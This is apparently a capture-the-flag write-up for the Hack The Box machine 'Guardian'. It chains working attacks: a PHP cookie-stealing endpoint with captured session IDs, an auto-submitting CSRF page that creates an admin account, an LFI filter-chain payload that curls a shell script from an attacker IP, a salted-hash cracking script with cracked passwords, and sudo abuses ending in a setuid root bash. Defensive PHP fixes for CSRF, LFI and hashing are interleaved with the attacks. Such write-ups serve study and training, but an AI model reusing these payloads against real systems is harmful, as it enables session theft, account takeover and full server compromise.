Guardian
```yaml
title: "OSINT : Techniques avancées pour les CTF et la Cybersécurité"
date: 2025-04-08
categories: [OSINT,HTB, THM]
tags: [osint, reconnaissance, investigations]
author: KET752SBAH # Your handle
image: https://www.vaadata.com/blog/wp-content/uploads/2024/12/cyber-osint.png # Theme image (1200x630 px)
description: "Découvrez les outils et méthodologies OSINT pour résoudre des challenges CTF et mener des investigations."
---
```
Reconnaissance:
```
└─$ nmap -sC -sV 10.10.11.84 --min-rate 5000 -p- --vv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-29 22:40 GMT
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:40
Completed NSE at 22:40, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:40
Completed NSE at 22:40, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:40
Completed NSE at 22:40, 0.00s elapsed
Initiating Ping Scan at 22:40
Scanning 10.10.11.84 [4 ports]
Completed Ping Scan at 22:40, 0.37s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 22:40
Scanning guardian.htb (10.10.11.84) [65535 ports]
Discovered open port 22/tcp on 10.10.11.84
Discovered open port 80/tcp on 10.10.11.84
Increasing send delay for 10.10.11.84 from 0 to 5 due to 1840 out of 6131 dropped probes since last increase.
Increasing send delay for 10.10.11.84 from 5 to 10 due to max_successful_tryno increase to 4
Increasing send delay for 10.10.11.84 from 10 to 20 due to max_successful_tryno increase to 5
Increasing send delay for 10.10.11.84 from 20 to 40 due to max_successful_tryno increase to 6
Increasing send delay for 10.10.11.84 from 40 to 80 due to max_successful_tryno increase to 7
Increasing send delay for 10.10.11.84 from 80 to 160 due to max_successful_tryno increase to 8
Increasing send delay for 10.10.11.84 from 160 to 320 due to max_successful_tryno increase to 9
Increasing send delay for 10.10.11.84 from 320 to 640 due to 5294 out of 17646 dropped probes since last increase.
Increasing send delay for 10.10.11.84 from 640 to 1000 due to 3937 out of 13121 dropped probes since last increase.
Completed SYN Stealth Scan at 22:40, 23.30s elapsed (65535 total ports)
Initiating Service scan at 22:40
Scanning 2 services on guardian.htb (10.10.11.84)
Completed Service scan at 22:40, 6.68s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.11.84.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:40
Completed NSE at 22:40, 7.15s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:40
Completed NSE at 22:40, 1.23s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:40
Completed NSE at 22:40, 0.01s elapsed
Nmap scan report for guardian.htb (10.10.11.84)
Host is up, received echo-reply ttl 63 (0.22s latency).
Scanned at 2025-10-29 22:40:02 GMT for 38s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 9c:69:53:e1:38:3b:de:cd:42:0a:c8:6b:f8:95:b3:62 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEtPLvoTptmr4MsrtI0K/4A73jlDROsZk5pUpkv1rb2VUfEDKmiArBppPYZhUo+Fopcqr4j90edXV+4Usda76kI=
|   256 3c:aa:b9:be:17:2d:5e:99:cc:ff:e1:91:90:38:b7:39 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHTkehIuVT04tJc00jcFVYdmQYDY3RuiImpFenWc9Yi6
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.52
| http-methods:
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-title: Guardian University - Empowering Future Leaders
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: _default_; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Subdomain enumeration:
```
└─$ sudo ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://guardian.htb/ -H "Host:FUZZ.guardian.htb" -fw 20

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.5.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://guardian.htb/
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.guardian.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response words: 20
________________________________________________

portal                  [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 237ms]
```
Credentials -> GU0142023 : GU1234
Vulnerability: IDOR
Credentials -> jamil.enockson@guardian.htb : DHsNnk3V503
Vulnerability: XSS
https://www.treegrid.com/FSheet
```
└─$ cat cookiestealer.php
<?php
if (isset($_GET['c'])) {
    $cookies = $_GET['c'];
    $file = fopen('cookies.txt', 'a');
    fwrite($file, $cookies . "\n\n");
    fclose($file);
}
?>
```
```
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.84 - - [30/Oct/2025 00:11:28] "GET /cookiestealer.php?c=PHPSESSID=n1m5fjq2lcmlu5i1gc59gtth0v HTTP/1.1" 200 -
```
I now have access to the lecturer portal; next I will try to obtain admin access.
I analysed the source code of admin/notices/create.php.
🔴 **Vulnerability: non-persistent Cross-Site Scripting (XSS)**
The vulnerability
This application's CSRF protection is broken for two reasons:
- Tokens are global: every CSRF token generated, for every user, is stored in one shared file (tokens.json). A token generated for you is therefore accepted as valid for a request made by an administrator.
- Tokens are never invalidated: a token is never deleted after use, so it can be replayed.
This means we can obtain a valid CSRF token with our own account, then use it in a CSRF attack against an administrator.
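For contrast, here is what the token handling should look like. This is an added example, not the portal's code: the shared-file pattern at the top mirrors the flaw just described, and the replacement keeps one single-use token per action inside the requesting user's own session and compares it in constant time. The session layout, the `createuser` action name and `create_user()` are assumptions.

```php
<?php
// Added example (not the Guardian portal's code). Shows the shared-file token
// scheme described above next to a per-session, single-use replacement.
declare(strict_types=1);

// --- The broken pattern: one pool of tokens shared by every user -------------
// Any token in the pool validates any request, for any user, any number of times.
function csrf_check_shared(string $presented, string $pool = 'tokens.json'): bool
{
    $tokens = json_decode((string) @file_get_contents($pool), true) ?: [];
    return in_array($presented, $tokens, true);   // never removed, never bound to a user
}

// --- The fix: tokens live in the requesting user's session ------------------
const CSRF_TTL = 900; // seconds a token stays usable

function csrf_issue(string $action): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    $token = bin2hex(random_bytes(32));            // 256 bits from the CSPRNG
    $_SESSION['csrf'][$action] = ['token' => $token, 'exp' => time() + CSRF_TTL];
    return $token;
}

function csrf_consume(string $action, ?string $presented): bool
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    $entry = $_SESSION['csrf'][$action] ?? null;
    unset($_SESSION['csrf'][$action]);             // single use: gone whether or not it matches
    if ($entry === null || $presented === null || time() > $entry['exp']) {
        return false;
    }
    return hash_equals($entry['token'], $presented);   // constant-time comparison
}

// --- How admin/createuser.php would use it (create_user() is assumed) -------
// Pair this with a SameSite=Lax (or Strict) session cookie so a cross-site
// form post does not carry the admin's session in the first place.
function handle_create_user(array $post, array $session_user): array
{
    if (($session_user['role'] ?? '') !== 'admin') {
        return [403, 'admin only'];                  // authorisation is checked first
    }
    if (!csrf_consume('createuser', $post['csrf_token'] ?? null)) {
        return [403, 'bad or reused CSRF token'];    // token from another session fails here
    }
    if (!in_array($post['user_role'] ?? '', ['student', 'lecturer'], true)) {
        return [400, 'role not allowed here'];       // no admin creation from this form
    }
    // create_user($post);  -- assumed application function
    return [200, 'created'];
}
```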
Exploitation scenario: forcing the creation of an account
Here is how to make an administrator create an account for you (which will itself be an administrator).
Step 1: obtain a valid CSRF token
- Log in to the application with any account (even a student account).
- Visit a page that generates a CSRF token, for example http://portal.guardian.htb/lecturer/notices/create.php (even if you are not a lecturer, the page may still generate a token).
- View the page source, find the value of csrf_token and copy it.
Step 2: build the trap web page
Create an HTML file (for example csrf_attack.html) with the following content. Replace VOTRE_JETON_CSRF_VALIDE with the token retrieved in step 1.
exploit.html
```html
<html>
<body>
    <script>
        function submitForm() {
            document.getElementById("csrf-form").submit();
        }
        window.onload = submitForm;
    </script>
    <h1>Veuillez patienter pendant le chargement de la page...</h1>
    <form id="csrf-form" action="http://portal.guardian.htb/admin/createuser.php" method="POST" style="display:none;">
        <input type="text" name="username" value="attaquant" />
        <input type="password" name="password" value="password123" />
        <input type="text" name="full_name" value="Attaquant" />
        <input type="email" name="email" value="attaquant@evil.com" />
        <input type="date" name="dob" value="2000-01-01" />
        <input type="text" name="address" value="123 Rue du Hack" />
        <input type="text" name="user_role" value="admin" />
        <input type="hidden" name="csrf_token" value="VOTRE_JETON_CSRF_VALIDE" />
    </form>
</body>
</html>
```
```
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.84 - - [30/Oct/2025 00:46:43] "GET /exploit.html HTTP/1.1" 200 -
10.10.11.84 - - [30/Oct/2025 00:46:43] code 404, message File not found
10.10.11.84 - - [30/Oct/2025 00:46:43] "GET /favicon.ico HTTP/1.1" 404 -
```
Vulnerability: LFI
We will also analyse the reports.php file.
I analysed admin/reports.php and found something very interesting: the code is vulnerable to local file inclusion (LFI), but some protections are in place.
Here is the relevant code:
```php
$report = $_GET['report'] ?? 'reports/academic.php';
if (strpos($report, '..') !== false) {
    die("Malicious request blocked 🚫");
}
if (!preg_match('/^(.*(enrollment|academic|financial|system)\.php)$/', $report)) {
    die("Access denied. Invalid file 🚫");
}
include($report);
```
The vulnerability and the protections
- The flaw (LFI): the line include($report); includes a file whose path is supplied by the user through the report URL parameter. This is a classic LFI.
- Protection 1 (anti-traversal): the code checks whether .. appears in the path, to prevent climbing up the directory tree. This is a basic protection.
- Protection 2 (regex): the code then checks that the file name ends with enrollment.php, academic.php, financial.php or system.php. This is the stronger protection.
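Both checks look at the string, not at what PHP will actually open, so a stream wrapper URL that merely ends in one of the four names satisfies them. The added example below (not the page's or the application's code) reproduces the two legacy checks to make that gap visible, then shows a hardened reports.php in which the parameter is a key into a fixed allow-list and the resolved path is verified on disk; the reports directory layout and the demo file are assumptions.

```php
<?php
// Added example, not the Guardian application's code: a hardened reports.php.
declare(strict_types=1);

// The two checks from the original reports.php, reproduced so the gap is visible:
// a php:// stream URL that merely *ends* in one of the four names satisfies both.
function legacy_checks_pass(string $report): bool
{
    if (strpos($report, '..') !== false) {
        return false;
    }
    return (bool) preg_match('/^(.*(enrollment|academic|financial|system)\.php)$/', $report);
}

// Hardened replacement: the parameter is a key, never a path. Only files
// listed here can ever be included, and the value is resolved on disk.
const REPORTS = [
    'academic'   => 'academic.php',
    'enrollment' => 'enrollment.php',
    'financial'  => 'financial.php',
    'system'     => 'system.php',
];

function resolve_report(?string $name, string $dir): ?string
{
    $name ??= 'academic';                       // same default as the original
    if (!array_key_exists($name, REPORTS)) {
        return null;                            // unknown key: nothing to include
    }
    $base = realpath($dir);
    $path = realpath($dir . DIRECTORY_SEPARATOR . REPORTS[$name]);
    if ($base === false || $path === false) {
        return null;                            // missing file is a 404, not an include
    }
    if (dirname($path) !== $base) {
        return null;                            // belt and braces: must sit in reports/
    }
    return $path;
}
// In the real page: $p = resolve_report($_GET['report'] ?? null, __DIR__ . '/reports');
//                   $p === null ? http_response_code(404) : include $p;

// Demonstration on constructed inputs (run from the CLI: php reports_hardened.php).
$filter = 'php://filter/convert.base64-encode/resource=reports/enrollment.php';
var_dump(legacy_checks_pass($filter));         // bool(true): the wrapper slips through
$tmp = sys_get_temp_dir() . '/reports_demo';   // assumed scratch directory
@mkdir($tmp);
file_put_contents("$tmp/system.php", "<?php echo 'system report';\n");
var_dump(resolve_report('system', $tmp));      // string: the real file under $tmp
var_dump(resolve_report($filter, $tmp));       // NULL: not a key in REPORTS
var_dump(resolve_report('../system', $tmp));   // NULL
```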
```
php://filter/convert.base64-encode/resource=reports/enrollment.php
```
We will use the php_filter_chain_generator.py script.
```
└─$ python3 php_filter_chain_generator.py --chain '<?php phpinfo(); ?>'
[+] The following gadget chain will generate the following code : <?php phpinfo(); ?> (base64 value: PD9waHAgcGhwaW5mbygpOyA/Pg)
```
```
python3 php_filter_chain_generator.py --chain '<?php system("curl http://10.10.14.15/shell.sh -o /tmp/shell.sh"); ?>'
python3 php_filter_chain_generator.py --chain '<?php system("chmod +x /tmp/shell.sh"); ?>'
```
```php
<?php
return [
    'db' => [
        'dsn' => 'mysql:host=localhost;dbname=guardiandb',
        'username' => 'root',
        'password' => 'Gu4rd14n_un1_1s_th3_b3st',
        'options' => []
    ],
    'salt' => '8Sb)tM1vs1SS'
];
```
```
mysql> desc users;
+---------------+------------------------------------+------+-----+-------------------+-----------------------------------------------+
| Field         | Type                               | Null | Key | Default           | Extra                                         |
+---------------+------------------------------------+------+-----+-------------------+-----------------------------------------------+
| user_id       | int                                | NO   | PRI | NULL              | auto_increment                                |
| username      | varchar(255)                       | YES  | UNI | NULL              |                                               |
| password_hash | varchar(255)                       | YES  |     | NULL              |                                               |
| full_name     | varchar(255)                       | YES  |     | NULL              |                                               |
| email         | varchar(255)                       | YES  |     | NULL              |                                               |
| dob           | date                               | YES  |     | NULL              |                                               |
| address       | text                               | YES  |     | NULL              |                                               |
| user_role     | enum('student','lecturer','admin') | YES  |     | student           |                                               |
| status        | enum('active','inactive')          | YES  |     | active            |                                               |
| created_at    | timestamp                          | YES  |     | CURRENT_TIMESTAMP | DEFAULT_GENERATED                             |
| updated_at    | timestamp                          | YES  |     | CURRENT_TIMESTAMP | DEFAULT_GENERATED on update CURRENT_TIMESTAMP |
+---------------+------------------------------------+------+-----+-------------------+-----------------------------------------------+
11 rows in set (0.01 sec)
```
```
mysql> select username, password_hash from users;
```
```python
#!/usr/bin/env python3
"""
Simple script to crack salted SHA-256 hashes using rockyou.txt
"""
import hashlib

# Configuration
SALT = '8Sb)tM1vs1SS'
WORDLIST_PATH = '/usr/share/wordlists/rockyou.txt'
HASHES_FILE = 'hashes.txt'
OUTPUT_FILE = 'cracked.txt'


def crack_hashes():
    # Load the hashes (one "username:hash" per line)
    users = {}
    with open(HASHES_FILE, 'r') as f:
        for line in f:
            if ':' in line:
                username, hash_val = line.strip().split(':', 1)
                users[username] = hash_val.lower()
    print(f"[+] {len(users)} hashs chargés")

    # Results
    cracked = {}

    # Try both salt positions
    methods = [
        ('password + salt', lambda p: p + SALT),
        ('salt + password', lambda p: SALT + p)
    ]

    for method_name, hash_func in methods:
        print(f"\n[*] Essai méthode: {method_name}")
        with open(WORDLIST_PATH, 'r', encoding='utf-8', errors='ignore') as f:
            for line_num, password in enumerate(f, 1):
                password = password.strip()
                if not password:
                    continue
                # Compute the candidate hash
                data = hash_func(password)
                hash_candidate = hashlib.sha256(data.encode()).hexdigest()
                # Compare it against every user's hash
                for username, real_hash in users.items():
                    if username not in cracked and hash_candidate == real_hash:
                        cracked[username] = password
                        print(f"[+] CRACKÉ: {username} -> {password}")
                # Progress
                if line_num % 100000 == 0:
                    print(f"[*] {line_num} mots de passe testés... {len(cracked)} trouvés")
                # Stop once everything is cracked
                if len(cracked) >= len(users):
                    break
        if len(cracked) >= len(users):
            break

    # Save the results
    with open(OUTPUT_FILE, 'w') as f:
        for username, password in cracked.items():
            f.write(f"{username}:{password}\n")

    # Print the summary
    print(f"\n[+] TERMINÉ: {len(cracked)}/{len(users)} mots de passe crackés")
    print(f"[+] Résultats sauvegardés dans: {OUTPUT_FILE}")


if __name__ == "__main__":
    crack_hashes()
```
```
└─$ cat cracked.txt
jamilenockson:copperhouse56
admin:fakebake000
```
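What makes the script above effective is the scheme itself: one application-wide salt and a single plain SHA-256, so every candidate password costs one hash and is checked against all accounts at once. The added example below (not the portal's code) verifies a legacy digest of that form and transparently upgrades it to password_hash() on the next successful login. The salt value comes from config.php on this page; that the legacy order was password . salt (the script's first method) and the users table access are assumptions.

```php
<?php
// Added example (not the portal's code). Legacy scheme as the cracking script
// models it: sha256(password . SALT) with one salt shared by every account.
// Verifying with that check and re-hashing with password_hash() retires it
// one account at a time, with no password reset required.
declare(strict_types=1);

const LEGACY_SALT = '8Sb)tM1vs1SS';     // value from config.php on the page

// Which order the legacy code used is an assumption; the script tried both.
function legacy_hash(string $password): string
{
    return hash('sha256', $password . LEGACY_SALT);
}

function is_legacy_hash(string $stored): bool
{
    return (bool) preg_match('/^[0-9a-f]{64}$/i', $stored);   // bare hex digest
}

/**
 * Verify $password against the stored users.password_hash value.
 * Returns [ok, newHash]: newHash is the value to persist when the row needs
 * upgrading (legacy digest) or rehashing (cost/algorithm changed), else null.
 */
function verify_and_upgrade(string $password, string $stored): array
{
    if (is_legacy_hash($stored)) {
        $ok = hash_equals($stored, legacy_hash($password));
        // Successful legacy login: replace the digest with a per-user salted,
        // work-factor hash (bcrypt via PASSWORD_DEFAULT).
        return [$ok, $ok ? password_hash($password, PASSWORD_DEFAULT) : null];
    }
    $ok = password_verify($password, $stored);
    $rehash = $ok && password_needs_rehash($stored, PASSWORD_DEFAULT);
    return [$ok, $rehash ? password_hash($password, PASSWORD_DEFAULT) : null];
}

// Constructed demonstration: one row before and after a single login.
$storedLegacy = legacy_hash('correct horse');

[$ok, $new] = verify_and_upgrade('correct horse', $storedLegacy);
assert($ok && $new !== null && !is_legacy_hash($new));     // upgraded to bcrypt

[$ok, $again] = verify_and_upgrade('correct horse', $new);
assert($ok && $again === null);                            // already strong, nothing to do

[$ok, $none] = verify_and_upgrade('wrong', $new);
assert(!$ok && $none === null);                            // rejected, no rehash

// Persisting the new value (UPDATE users SET password_hash = ? WHERE user_id = ?)
// is left to the application's DB layer.
```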
```
www-data@guardian:~/portal.guardian.htb/admin$ cd /home
www-data@guardian:/home$ ls
gitea  jamil  mark  sammy
www-data@guardian:/home$ su jamil
Password:
jamil@guardian:/home$ ls
```
```
jamil@guardian:~$ sudo -l
Matching Defaults entries for jamil on guardian:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User jamil may run the following commands on guardian:
    (mark) NOPASSWD: /opt/scripts/utilities/utilities.py
jamil@guardian:~$
```
```
echo 'import os; os.system("/bin/bash")' > /opt/scripts/utilities/utils/status.py
sudo -u mark cp /opt
sudo -u mark /opt/scripts/utilities/utilities.py system-status
```
```
mark@guardian:/opt/scripts/utilities/utils$ id
uid=1001(mark) gid=1001(mark) groups=1001(mark),1002(admins)
```
```
mark@guardian:~$ sudo -l
Matching Defaults entries for mark on guardian:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User mark may run the following commands on guardian:
    (ALL) NOPASSWD: /usr/local/bin/safeapache2ctl
```
```bash
# Create the configuration directory
mkdir -p /home/mark/confs

# Create the malicious Apache configuration file
cat > /home/mark/confs/root.conf << 'EOF'
ServerName localhost
LoadModule mpm_event_module /usr/lib/apache2/modules/mod_mpm_event.so
ErrorLog "|/bin/sh -c 'cp /bin/bash /tmp/rootbash && chmod 4755 /tmp/rootbash'"
Listen 127.0.0.1:8080
EOF

# Run Apache with the malicious configuration
sudo /usr/local/bin/safeapache2ctl -f /home/mark/confs/root.conf

# Use the rootbash binary to get a root shell
/tmp/rootbash -p
```